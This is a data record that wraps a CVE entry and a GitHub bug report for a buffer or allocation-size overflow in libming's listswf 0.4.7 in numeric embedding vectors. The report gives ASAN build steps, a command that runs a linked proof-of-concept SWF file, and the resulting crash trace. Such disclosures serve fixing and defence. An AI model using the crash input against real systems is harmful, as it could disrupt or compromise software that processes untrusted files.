-0.00007630491018062457, -0.03897351771593094, -0.015576794743537903, -0.005151535850018263, -0.00569152133539319, 0.015466433018445969, -0.0054510897025465965, 0.008560930378735065, -0.005592983681708574, -0.006803023163229227, 0.011296329088509083, 0.003111811587586999, -0.019108375534415245, -0.024263853207230568, 0.011856021359562874, -0.014165738597512245, 0.010240008123219013, 0.01680654101073742, -0.017169158905744553, -0.00035030051367357373, -0.01792592741549015, -0.008229845203459263, 0.02352285198867321, 0.011154435575008392, -0.007394247688353062, -0.007208997383713722, -0.015844816341996193, 0.004446008242666721, -0.0010582918766885996, -0.0024713184684515, 0.02191472053527832, -0.010310955345630646, -0.014993453398346901, -0.0006828642799519002, 0.02218274213373661, -0.001274088746868074, 0.011808724142611027, -0.010531678795814514, 0.014417994767427444, 0.013708525337278843, -0.023901235312223434, 0.008371738716959953, 0.008750122040510178, 0.018020521849393845, 0.020385419949889183, 0.004331704694777727, 0.01388195063918829, -0.011493404395878315, 0.01120961643755436, -0.014544122852385044, -0.020637676119804382, 0.00301130348816514, 0.02911977656185627, 0.029009414836764336, 0.014914623461663723, -0.008608228527009487, -0.03044411912560463, 0.007544024381786585, -0.008020945824682713, -0.008363856002688408, 0.0007543039391748607, -0.049568261951208115, -0.007540083024650812, 0.014599303714931011, 0.012502427212893963, -0.008080068044364452, 0.01324342843145132, 0.019407929852604866, 0.016648881137371063, 0.025808919221162796, 0.0013272989308461547, -0.004040034022182226, 0.03796449676156044, -0.010184827260673046, 0.0285679679363966, -0.011903319507837296, -0.00593589385971427, -0.022639956325292587, -0.006806964520365, 0.01631779596209526, -0.0007291768561117351, -0.00869494117796421, -0.00216979393735528, 0.02431115135550499, 0.016443923115730286, -0.008923548273742199, -0.01068933866918087, -0.025036387145519257, 0.0007937189075164497, -0.005979250185191631, -0.013030587695538998, 0.0021244667004793882, -0.003019186435267329, -0.010783934965729713, 0.0019776460248976946, 0.015655623748898506, -0.041527606546878815, -0.009727614000439644, -0.011556467972695827, 0.003411365207284689, 0.008710707537829876, -0.00841115415096283, -0.006152676418423653, 0.0029167074244469404, 0.015135346911847591, 0.009656666778028011, 0.004481481853872538, -0.01761060766875744, 0.0013676993548870087, -0.021851656958460808, 0.020480016246438026, -0.02539900504052639, 0.011517053470015526, 0.0014465292915701866, 0.013574514538049698, 0.026660282164812088, 0.0034803415182977915, -0.03629330173134804, -0.02027505822479725, -0.006460112985223532, -0.0005636340356431901, -0.0031571388244628906, 0.00827714242041111, -0.01709032990038395, 0.015789635479450226, 0.004836216568946838, -0.01162741519510746, 0.014827909879386425, -0.0145756546407938, 0.0028319652192294598, 0.026549920439720154, -0.011848138645291328, 0.0033207109663635492, 0.019360631704330444, 0.0003224636893719435, -0.010634157806634903, -0.012486660853028297, 0.006062021944671869, -0.016948435455560684, -0.013945015147328377, -0.005368318408727646, -0.011099254712462425, -0.004883514251559973, 0.02861526608467102, -0.0015352129703387618, 0.00012434189557097852, -0.015553145669400692, 0.0039966776967048645, 0.02248229645192623, -0.020259292796254158, -0.016475455835461617, 0.015229943208396435, -0.012463012710213661, -0.010405550710856915, 0.011635297909379005, 0.0029521810356527567, 0.017437180504202843, -0.005561451893299818, -0.013401088304817677, 0.0023491319734603167, -0.01427610032260418, 0.010129646398127079, -0.009522655978798866, 0.0008341192151419818, -0.0008282069466076791, 0.01902954652905464, 0.023869702592492104, -0.002723574172705412, -0.026565687730908394, 0.0033285939134657383, 0.002311687683686614, 0.0015874378150328994, 0.01322766300290823, 0.003517785808071494, 0.004099156707525253, -0.010011401027441025, 0.0190137792378664, -0.002224974799901247, -0.0022367993369698524, 0.0010563210817053914, 0.010902179405093193, 0.008489984087646008, -0.004434183705598116, 0.0010592772159725428, 0.008876250125467777, -0.0015480228466913104, -0.003809456480666995, -0.014394345693290234, -0.00013782920723315328, 0.024421513080596924, -0.004698263946920633, -0.005975308828055859, -0.0005636340356431901, -0.022813381627202034, -0.017263755202293396, 0.0039178477600216866, -0.007500668056309223, -0.018556566908955574, 0.017484478652477264, 0.004883514251559973, 0.0021402325946837664, -0.003098016371950507, 0.019061077386140823, 0.005983192007988691, 0.0023984008003026247, 0.02886752039194107, 0.0052382489666342735, -0.0012080686865374446, 0.000752825872041285, 0.006361575331538916, -0.01787862926721573, -0.005502329207956791, 0.020401187241077423, 0.019975503906607628, -0.022387700155377388, -0.0013608017470687628, -0.014938272535800934, -0.008907781913876534, -0.0015854670200496912, 0.0008227874059230089, -0.0078041632659733295, -0.004702205304056406, 0.01973901502788067, -0.005403792019933462, -0.01057109422981739, -0.017184924334287643, 0.005896478891372681, 0.011185967363417149, -0.016365094110369682, -0.006192091386765242, 0.017232222482562065, -0.003399540903046727, 0.03610410913825035, 0.003691211575642228, -0.00024585085338912904, -0.0006468981155194342, -0.01871422678232193, 0.012187107466161251, -0.004552428610622883, -0.015024985186755657, -0.013803120702505112, 0.009656666778028011, 0.003539463970810175, -0.01057109422981739, -0.01538760308176279, 0.0033620966132730246, 0.0064285811968147755, 0.02189895510673523, -0.009593603201210499, 0.011075605638325214, 0.020527314394712448, 0.019865142181515694, 0.00882106926292181, -0.013424737378954887, -0.0038764618802815676, 0.009286166168749332, 0.013795237988233566, -0.0007646503509022295, -0.008939314633607864, -0.015537379309535027, 0.0018554595299065113, -0.008773771114647388, -0.020511548966169357, 0.007595263887196779, -0.017484478652477264, -0.004520896822214127, 0.014512590132653713, -0.001227776170708239, -0.014536239206790924, 0.009585719555616379, 0.011682596057653427, -0.0018475765828043222, -0.038374412804841995, -0.018398907035589218, 0.010113880038261414, -0.014386462979018688, 0.011398808099329472, -0.009136389009654522, 0.015994593501091003, -0.03556806594133377, -0.011722010560333729, 0.0031610801815986633, 0.009349229745566845, 0.011335744522511959, 0.008474217727780342, 0.021221017464995384, 0.02536747232079506, -0.0070671034045517445, -0.011982149444520473, 0.0029245903715491295, 0.018272778019309044, -0.023365192115306854, 0.0073784817941486835, -0.01792592741549015, -0.02755894511938095, -0.0027590475510805845, 0.010247890837490559, -0.0005567363696172833, 0.016506988555192947, 0.0351896807551384, -0.011225382797420025, -0.008600345812737942, -0.00026334123685956, 0.007157757878303528, 0.01066568959504366, 0.011974266730248928, -0.010791817680001259, 0.022403467446565628, 0.012738917022943497, 0.010870647616684437, -0.021709762513637543, -0.00015716717462055385, 0.00792634952813387, 0.01902954652905464, 0.0092152189463377, 0.02989231050014496, 0.018020521849393845, 0.00951477326452732, -0.008750122040510178, -0.0004067131958436221, -0.0076701524667441845, -0.017437180504202843, 0.009696081280708313, 0.03123241849243641, -0.017484478652477264, 0.0063852244056761265, 0.009696081280708313, 0.017784032970666885, 0.013456269167363644, 0.009585719555616379, 0.014898857101798058, 0.01791016012430191, 0.013606046326458454, 0.01844620332121849, -0.03020763024687767, -0.007390306331217289, 0.0014544122386723757, 0.017815563827753067, -0.003168963361531496, 0.0016731653595343232, 0.012092511169612408, 0.007484902162104845, 0.017011499032378197, -0.00047297959099523723, -0.02648685686290264, -0.03238333761692047, 0.019628653302788734, 0.01175354328006506, -0.014599303714931011, 0.039099644869565964, 0.011808724142611027, -0.014126324094831944, -0.01096524391323328, 0.0032793250866234303, 0.0057861171662807465, 0.00960936862975359, 0.003827193286269903, -0.007792338728904724, 0.01630203053355217, -0.00880530383437872, 0.015324538573622704, 0.003949379548430443, -0.0035138442181050777, 0.005620574112981558, 0.007090752478688955, -0.01813088357448578, 0.012399948202073574, 0.016089189797639847, -0.009648784063756466, 0.0033187400549650192, 0.000712425506208092, -0.0073233009316027164, -0.0001468207483412698, -0.00120412721298635, 0.0049268705770373344, -0.028394540771842003, 0.008363856002688408, -0.003649825928732753, -0.0008602316374890506, -0.003762158565223217, -0.019660186022520065, 0.00011898393131559715, -0.005313137546181679, -0.007000098004937172, -0.02566702663898468, 0.01029518898576498, -0.018808821216225624, 0.017011499032378197, 0.01682230830192566, -0.00038257151027210057, -0.018052054569125175, -0.014764846302568913, 0.009270399808883667, 0.010200593620538712, -0.015876349061727524, 0.019139908254146576, -0.008876250125467777, -0.017043031752109528, -0.002804374787956476, -0.005648164544254541, 0.017768267542123795, -0.004371119663119316, -0.010736636817455292, 0.024658001959323883, -0.0009745350107550621, 0.0015371836489066482, 0.0014780611963942647, -0.01895071566104889, -0.005963484290987253, 0.014086908660829067, 0.020511548966169357, 0.018777290359139442, 0.0032024660613387823, -0.009002378210425377, -0.006996156647801399, -0.004536662716418505, 0.011020424775779247, 0.015907879918813705, 0.01243936363607645, -0.03370767831802368, 0.0002650656388141215, -0.005514153745025396, 0.01521417684853077, -0.02883598953485489, 0.017563309520483017, 0.005577217787504196, -0.0029167074244469404, 0.0017874686745926738, -0.013416854664683342, 0.012762566097080708, -0.019612887874245644, 0.003986823838204145, 0.00030694404267705977, -0.012518193572759628, -0.025052152574062347, -0.00906544178724289, 0.006917326711118221, 0.002967946929857135, 0.0054116747342050076, 0.017563309520483017, 0.0022289163898676634, -0.011430339887738228, -0.0027610184624791145, -0.007193231489509344, 0.001599262235686183, 0.0059595429338514805, 0.013385322876274586, 0.009435943327844143, 0.012234405614435673, 0.013550865463912487, 0.005222483072429895, 0.011272680014371872, -0.003980911802500486, -0.01135939359664917, 0.018808821216225624, -0.0051436531357467175, -0.01578175276517868, -0.017768267542123795, -0.004272582475095987, -0.01953405700623989, -0.01016906090080738, 0.010247890837490559, 0.011580117046833038, 0.009656666778028011, 0.004706147126853466, 0.024468811228871346, 0.007815987803041935, 0.0014928418677300215, 0.010405550710856915, 0.00951477326452732, -0.024689534679055214, -0.016979968175292015, -0.01660158298909664, 0.0035059612710028887, -0.007520375307649374, -0.029340500012040138, 0.05890172719955444, -0.005931952502578497, -0.006511352490633726, -0.030254928395152092, 0.004280465189367533, -0.0147017827257514, -0.0007680991548113525, 0.011974266730248928, 0.0011972296051681042, -0.001252410584129393, 0.0037109190598130226, 0.015143229626119137, 0.00034118580515496433, -0.013724290765821934, 0.003324652323499322, -0.0000634950483799912, 0.0010474526789039373, 0.003230056492611766, 0.0005951659986749291, 0.007685918360948563, -0.008639760315418243, 0.01973901502788067, -0.0012878839625045657, -0.00473373755812645, -0.017799798399209976, -0.014749079942703247, -0.017516011372208595, 0.025525132194161415, 0.017437180504202843, -0.017279520630836487, 0.015529496595263481, 0.010090230964124203, 0.0232075322419405, -0.01189543679356575, 0.009435943327844143, 0.014504707418382168, -0.015143229626119137, 0.023412490263581276, 0.0057033454068005085, -0.008379621431231499, -0.004489364568144083, 0.01176930870860815, -0.019644418731331825, -0.0029738591983914375, -0.010437083430588245, 0.011540702544152737, -0.01147763803601265, 0.010799700394272804, 0.012636438012123108, 0.031058993190526962, 0.02007010020315647, 0.0048519824631512165, 0.03175269812345505, 0.019770547747612, 0.00034635901101864874, 0.01351145002990961, -0.005257956683635712, 0.0027905795723199844, -0.008127366192638874, 0.006728134583681822, -0.013306492939591408, -0.02085839956998825, -0.015970943495631218, -0.000966652063652873, -0.010121763683855534, 0.0160813070833683, -0.011856021359562874, 0.016664648428559303, 0.032793253660202026, 0.008434802293777466, -0.00331085710786283, 0.0007710552890785038, -0.00003907624341081828, 0.004784977063536644, 0.019565589725971222, -0.008190429769456387, 0.015978828072547913, -0.015892114490270615, -0.022293105721473694, -0.012880810536444187, 0.013338024728000164, 0.01349568460136652, 0.003799602622166276, -0.00973549671471119, 0.00641675665974617, -0.007299651857465506, -0.01455200556665659, -0.020259292796254158, -0.012841396033763885, 0.029766181483864784, 0.013598163612186909, 0.008876250125467777, -0.01764213852584362, -0.008182547055184841, -0.005632398650050163, 0.014402228407561779, -0.009010260924696922, -0.01536395400762558, -0.005033290944993496, 0.001195258810184896, 0.013606046326458454, 0.011272680014371872, -0.01241571456193924, 0.0004567209107335657, -0.0009163979557342827, -0.0013361673336476088, 0.005068764556199312, -0.014496824704110622, 0.016428157687187195, 0.010744519531726837, -0.001719477935694158, 0.03225720673799515, 0.008166780695319176, -0.0054905046708881855, -0.008616111241281033, 0.011729894205927849, 0.009380761533975601, 0.016160136088728905, 0.0006932106916792691, 0.0036636211443692446, 0.0029423271771520376, -0.0002095151721732691, -0.014875208027660847, -0.023680511862039566, 0.015017102472484112, 0.012857162393629551, -0.0037089483812451363, 0.000740508665330708, -0.010752403177320957, 0.031153589487075806, -0.00620391545817256, 0.010586859658360481, -0.006665070541203022, 0.013661227189004421, 0.003866608254611492, 0.011130786500871181, 0.0037798951379954815, 0.024106193333864212, 0.023412490263581276, 0.023838171735405922, -0.008064301684498787, 0.03957262635231018, -0.013676993548870087, -0.00827714242041111, -0.011319978162646294, 0.024263853207230568, -0.0021185544319450855, -0.01401596236974001, -0.013700642623007298, -0.021284081041812897, 0.0034882244653999805, 0.0023097170051187277, 0.02754317782819271, 0.00828502606600523, -0.013306492939591408, -0.0016012330306693912, -0.025525132194161415, 0.008505749516189098, 0.009956220164895058, -0.005029349587857723, 0.009002378210425377, 0.006838496774435043, 0.009853741154074669, 0.019880909472703934, 0.021252550184726715, -0.0020614026580005884, 0.029750416055321693, 0.003436984959989786, -0.0134878009557724, 0.013282843865454197, 0.004749503452330828, -0.03950956091284752, -0.013811004348099232, -0.007827811874449253, 0.012273820117115974, 0.01603400893509388, 0.011130786500871181, -0.005380142945796251, 0.010886413976550102, 0.005522036924958229, 0.01792592741549015, 0.008348089642822742, 0.0020712565165013075, 0.011264797300100327, -0.004918987862765789, -0.011651064269244671, -0.010192709974944592, 0.0242953859269619, 0.005793999880552292, -0.014079025946557522, -0.010752403177320957, -0.018036289140582085, 0.001164712244644761, -0.02327059581875801, 0.0016189697198569775, -0.0017293316777795553, -0.011422457173466682, 0.0065980651415884495, 0.026849474757909775, -0.008395387791097164, 0.010642040520906448, -0.005159419029951096, -0.009183687157928944, 0.022230040282011032 ]
CVE-2023-36239
2023-06-22T19:15:09.037000
libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/273" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "18B4A4AA-DE48-45A4-AE25-1C83C1CDC743", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/273
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
# Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948. ## Environment Ubuntu 18.04, 64 bit libming 0.4.7 ## Steps to reproduce 1. download file ``` git clone https://github.com/libming/libming.git libming-ming-0_4_7 ``` 2. compile libming with ASAN ``` cd libming-ming-0_4_7 git checkout 5aa3470 ./autogen.sh export FORCE_UNSAFE_CONFIGURE=1 export LLVM_COMPILER=clang CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared make make install cd obj-bc/bin/ extract-bc listswf clang -fsanitize=address -lz -lm listswf.bc -o listswf_asan ``` 3. command for reproducing the error ``` ./listswf_asan poc ``` Download poc: [libming_0-4-7_listswf_allocation-size-overflow_parser1948.zip](https://github.com/libming/libming/files/11731679/libming_0-4-7_listswf_allocation-size-overflow_parser1948.zip) ## ASAN report ``` root@a71b82b5d288:~/dataset/libming-ming-0_4_7/obj-bc/bin# ./listswf_asan libming_0-4-7_listswf_allocation-size-overflow_parser1948.swf header indicates a filesize of 6350 but filesize is 296 File version: 10 File size: 296 Frame size: (0,0)x(0,0) Frame rate: 237.609375 / sec. Total frames: 31640 ================================================================= ==29667==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffed6 (0x6d8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x4ade60 in malloc /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x50fefd in parseSWF_DEFINEFONTINFO /root/dataset/libming-ming-0_4_7/util/parser.c:1948:34 #2 0x4fefda in blockParse /root/dataset/libming-ming-0_4_7/util/blocktypes.c:145:14 #3 0x4fceb2 in readMovie /root/dataset/libming-ming-0_4_7/util/main.c:265:11 #4 0x4fca7d in main /root/dataset/libming-ming-0_4_7/util/main.c:350:2 #5 0x7fa41cb57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 ==29667==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==29667==ABORTING ```
Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948
https://api.github.com/repos/libming/libming/issues/273/comments
0
2023-06-13T07:08:07
2023-06-13T07:08:07Z
https://github.com/libming/libming/issues/273
1,754,192,903
273
true
This is a GitHub Issue repo:libming owner:libming Title : Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 Issue date: --- start body --- # Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948. ## Environment Ubuntu 18.04, 64 bit libming 0.4.7 ## Steps to reproduce 1. download file ``` git clone https://github.com/libming/libming.git libming-ming-0_4_7 ``` 2. compile libming with ASAN ``` cd libming-ming-0_4_7 git checkout 5aa3470 ./autogen.sh export FORCE_UNSAFE_CONFIGURE=1 export LLVM_COMPILER=clang CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared make make install cd obj-bc/bin/ extract-bc listswf clang -fsanitize=address -lz -lm listswf.bc -o listswf_asan ``` 3. command for reproducing the error ``` ./listswf_asan poc ``` Download poc: [libming_0-4-7_listswf_allocation-size-overflow_parser1948.zip](https://github.com/libming/libming/files/11731679/libming_0-4-7_listswf_allocation-size-overflow_parser1948.zip) ## ASAN report ``` root@a71b82b5d288:~/dataset/libming-ming-0_4_7/obj-bc/bin# ./listswf_asan libming_0-4-7_listswf_allocation-size-overflow_parser1948.swf header indicates a filesize of 6350 but filesize is 296 File version: 10 File size: 296 Frame size: (0,0)x(0,0) Frame rate: 237.609375 / sec. Total frames: 31640 ================================================================= ==29667==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffed6 (0x6d8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x4ade60 in malloc /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x50fefd in parseSWF_DEFINEFONTINFO /root/dataset/libming-ming-0_4_7/util/parser.c:1948:34 #2 0x4fefda in blockParse /root/dataset/libming-ming-0_4_7/util/blocktypes.c:145:14 #3 0x4fceb2 in readMovie /root/dataset/libming-ming-0_4_7/util/main.c:265:11 #4 0x4fca7d in main /root/dataset/libming-ming-0_4_7/util/main.c:350:2 #5 0x7fa41cb57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 ==29667==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc ==29667==ABORTING ``` --- end body ---
2,627
[ -0.010458309203386307, 0.03437985107302666, -0.006978343706578016, 0.009044228121638298, 0.06976134330034256, 0.016350314021110535, -0.0320819690823555, 0.05252722650766373, -0.0371490940451622, 0.04416057839989662, -0.0018983304034918547, 0.00837401207536459, 0.017985345795750618, 0.015046708285808563, 0.0018163947388529778, -0.013691547326743603, -0.017852775752544403, 0.011887121014297009, -0.0016755389515310526, 0.0026311485562473536, 0.015584354288876057, -0.013838847167789936, -0.046841442584991455, 0.046046022325754166, -0.012697271071374416, 0.016011524945497513, -0.015186643227934837, -0.00690469378605485, 0.0060429880395531654, 0.02891501598060131, 0.005925147794187069, 0.01761709526181221, 0.0045663039200007915, -0.010929670184850693, 0.028664605692029, 0.00955977849662304, 0.05494295060634613, 0.07376790791749954, -0.0002596164704300463, 0.007225071545690298, -0.006300763227045536, -0.04259919747710228, -0.025836443528532982, 0.018073726445436478, -0.02110810950398445, 0.008639153093099594, 0.016718564555048943, -0.016851134598255157, -0.05597405135631561, 0.010060599073767662, 0.028885556384921074, -0.0006034702528268099, -0.043158937245607376, -0.05697569251060486, -0.003859263379126787, -0.014796297997236252, 0.013264376670122147, 0.021225949749350548, 0.01235848106443882, -0.0017989028710871935, -0.024820072576403618, -0.004503701347857714, 0.016968974843621254, 0.01683640480041504, -0.003406315576285124, 0.002760036149993539, -0.0262930728495121, 0.03258278965950012, -0.02691173367202282, 0.01577584445476532, -0.003551774425432086, -0.014428048394620419, 0.018427247181534767, 0.021417438983917236, 0.0004916142206639051, -0.019679296761751175, 0.03709017485380173, -0.005424327217042446, -0.03762045502662659, 0.07859934866428375, -0.043158937245607376, 0.018633466213941574, -0.021387979388237, 0.030991947278380394, 0.047813624143600464, 0.03617691248655319, -0.022625301033258438, -0.0775977075099945, -0.05173180624842644, -0.07023270428180695, -0.011806105263531208, 0.015540163964033127, 0.03629475086927414, 0.030196527019143105, -0.00019172033353243023, 0.0071808816865086555, -0.025276701897382736, -0.0037009157240390778, -0.05650433152914047, -0.016276665031909943, -0.04180377721786499, 0.015672734007239342, 0.010274183936417103, -0.01981186866760254, 0.022286510095000267, 0.03479229286313057, -0.009721809066832066, -0.030962487682700157, 0.03258278965950012, 0.10965021699666977, 0.03411471098661423, 0.009876473806798458, -0.020725129172205925, 0.022021370008587837, -0.014567983336746693, 0.039741575717926025, 0.03962373733520508, -0.004400591365993023, -0.06286769360303879, 0.014420682564377785, -0.01038465928286314, -0.027324175462126732, -0.017646556720137596, 0.0028465751092880964, -0.03373172879219055, 0.02163838967680931, 0.016939515247941017, -0.052026405930519104, -0.0034412993118166924, -0.02962205745279789, -0.032730087637901306, -0.031492769718170166, 0.006864186376333237, -0.0032387615647166967, -0.005516389850527048, 0.00246359477750957, -0.01593787409365177, 0.02155000902712345, 0.03620637208223343, 0.01271200180053711, -0.03514581173658371, -0.01292558666318655, 0.015599084086716175, -0.006127685308456421, -0.02296409010887146, 0.01935523748397827, 0.0017169672064483166, 0.019325777888298035, -0.023185040801763535, 0.02928326651453972, 0.016512345522642136, -0.01953199692070484, 0.02437817119061947, 0.014722648076713085, 0.02735363505780697, -0.01038465928286314, 0.0112169049680233, 0.03941751644015312, 0.030373286455869675, -0.02638145349919796, 0.003807708388194442, -0.01204915065318346, 0.01397878210991621, -0.04743064194917679, -0.01892806775867939, -0.020725129172205925, 0.009964853525161743, 0.01235848106443882, 0.00727294385433197, 0.03252387046813965, 0.04041915759444237, 0.03270062804222107, -0.0028834000695496798, 0.008617057465016842, -0.05352886766195297, 0.002435975940898061, -0.008668612688779831, 0.02296409010887146, -0.02006227895617485, -0.0012115435674786568, -0.007151421625167131, 0.010797100141644478, 0.015407593920826912, 0.01674802415072918, -0.017911696806550026, -0.028281625360250473, 0.016512345522642136, -0.05058286711573601, 0.016585994511842728, -0.010635069571435452, 0.0003498378209769726, 0.0015135088469833136, -0.0258511733263731, -0.016144094988703728, 0.03941751644015312, 0.00016375632549170405, -0.01611463539302349, -0.0418921560049057, -0.0026753386482596397, -0.003551774425432086, 0.0009031339432112873, -0.011334745213389397, -0.028149055317044258, 0.030815187841653824, -0.05517863109707832, 0.014229192398488522, -0.030255448073148727, 0.032464947551488876, 0.01682167500257492, -0.017396146431565285, 0.002148740692064166, -0.014759473502635956, 0.010554054751992226, 0.00872016791254282, -0.01814737543463707, 0.016320854425430298, 0.010141613893210888, 0.042893797159194946, 0.001074370346032083, -0.002458070870488882, 0.02646983414888382, -0.023273421451449394, 0.010509864427149296, -0.015304483473300934, -0.03402633219957352, -0.016895325854420662, -0.019399426877498627, -0.011636710725724697, -0.029592595994472504, 0.027913374826312065, 0.02882663533091545, -0.005984067916870117, -0.027368364855647087, 0.02297881990671158, 0.03709017485380173, 0.004555256571620703, 0.01038465928286314, -0.0007733256788924336, -0.008484487421810627, 0.013072886504232883, 0.012203816324472427, 0.02110810950398445, -0.009581873193383217, -0.0069857086054980755, 0.00897794310003519, 0.041332416236400604, -0.02349437028169632, -0.023111389949917793, -0.020548367872834206, 0.0191784780472517, -0.004743064288049936, -0.01909009739756584, 0.030122876167297363, -0.015031978487968445, 0.02384789101779461, 0.0027692425064742565, 0.04716550186276436, 0.02271367982029915, -0.009743903763592243, -0.001098306616768241, 0.025394542142748833, -0.0027379412204027176, -0.02084296941757202, 0.021712038666009903, -0.024554932489991188, 0.007961572147905827, -0.01639450527727604, -0.00016985546972136945, 0.0013082092627882957, -0.009847014211118221, 0.030343826860189438, -0.02041579782962799, -0.005899370182305574, -0.015481243841350079, -0.011769280768930912, -0.0018173153512179852, 0.01805899664759636, 0.002905494999140501, 0.04530952125787735, -0.018117915838956833, 0.004684144165366888, 0.028988666832447052, -0.013293837197124958, 0.03314252942800522, 0.006882598623633385, -0.019311048090457916, 0.0077479868195950985, -0.012152261100709438, -0.030343826860189438, -0.01804426684975624, 0.012329021468758583, -0.03261224925518036, -0.04127349704504013, 0.005586357321590185, -0.02726525440812111, 0.016085173934698105, 0.004533161409199238, 0.003544409526512027, -0.018427247181534767, -0.013639992102980614, -0.008867467753589153, -0.011121160350739956, 0.017513984814286232, -0.02155000902712345, -0.011165349744260311, -0.0030159701127558947, -0.01602625474333763, -0.002610894851386547, -0.019694028422236443, 0.003004922764375806, 0.026160502806305885, -0.03252387046813965, -0.008381377905607224, 0.002150581916794181, -0.03057950735092163, -0.00436376640573144, 0.018294677138328552, -0.032906848937273026, -0.017587635666131973, 0.008617057465016842, -0.018869146704673767, 0.0006297080544754863, -0.03128654882311821, 0.027486205101013184, 0.005660007707774639, 0.0035094255581498146, -0.028664605692029, 0.04410165920853615, -0.03446822986006737, 0.028532035648822784, -0.013993512839078903, -0.006720568519085646, -0.028414195403456688, -0.04130295664072037, 0.015613813884556293, -0.05246830731630325, 0.009073687717318535, 0.023612210527062416, 0.009125242941081524, 0.015805304050445557, -0.03252387046813965, 0.02339126169681549, -0.02314085140824318, -0.0196203775703907, -0.015186643227934837, -0.007615416776388884, 0.005033981986343861, -0.02558603323996067, 0.017381414771080017, 0.015275023877620697, 0.001016370952129364, 0.018206296488642693, 0.04136187583208084, 0.027766074985265732, -0.010745544917881489, -0.024952642619609833, -0.009279908612370491, -0.005678419955074787, 0.016055714339017868, -0.0008810388972051442, -0.0292685367166996, -0.03131600841879845, -0.02593955397605896, -0.00492718955501914, 0.01657126471400261, -0.014619538560509682, 0.019502537325024605, -0.0008368488634005189, -0.008543407544493675, 0.007696432061493397, -0.02060728892683983, 0.029165426269173622, -0.032906848937273026, 0.05037664622068405, -0.012012326158583164, -0.0151571836322546, 0.025291433557868004, -0.0025851172395050526, -0.029695706441998482, 0.023464910686016083, -0.0466352216899395, 0.009662888944149017, 0.030815187841653824, -0.02785445563495159, 0.0219919104129076, 0.009824918583035469, 0.005601087585091591, 0.03582339361310005, -0.0009675777400843799, -0.011157984845340252, -0.029077045619487762, 0.032464947551488876, -0.027397824451327324, -0.051496125757694244, -0.014185003004968166, 0.028355276212096214, -0.0035020606592297554, -0.04183323681354523, 0.03602961078286171, -0.045869261026382446, 0.007674336899071932, -0.0012575748842209578, 0.04796092212200165, 0.01595260389149189, 0.005439057480543852, 0.031080327928066254, 0.01726357638835907, -0.023096660152077675, 0.03576447069644928, -0.006495935842394829, 0.01179137546569109, -0.007725892122834921, -0.04569249972701073, 0.0055532148107886314, 0.059538714587688446, 0.03888723626732826, -0.01604098454117775, -0.021623659878969193, -0.001229035435244441, 0.03131600841879845, -0.02514413185417652, 0.013323296792805195, 0.014811028726398945, 0.012991871684789658, 0.031846288591623306, 0.011754550971090794, -0.012446860782802105, 0.02479061298072338, 0.009824918583035469, -0.027574583888053894, -0.023730050772428513, 0.0392407551407814, 0.03638313338160515, 0.004975061863660812, -0.026086853817105293, -0.02567441388964653, -0.021962448954582214, -0.03753207251429558, -0.01402297243475914, -0.0030067639891058207, -0.018648196011781693, 0.018206296488642693, -0.009191527962684631, -0.025365082547068596, 0.010929670184850693, -0.03520473092794418, -0.006105590611696243, -0.001359764370135963, 0.0276187751442194, 0.006735298782587051, -0.012638350948691368, 0.018441976979374886, -0.010546689853072166, 0.0012888761702924967, 0.03337820991873741, -0.01963510736823082, -0.011842930689454079, -0.012763556092977524, 0.009324098005890846, -0.015407593920826912, 0.00303438282571733, 0.015319214202463627, -0.03726693242788315, -0.014000877737998962, 0.030638428404927254, 0.036412592977285385, 0.01240267138928175, -0.014847853220999241, -0.0020658844150602818, -0.008351917378604412, 0.024422362446784973, 0.028428925201296806, 0.01376519724726677, -0.03190520778298378, -0.0024562296457588673, 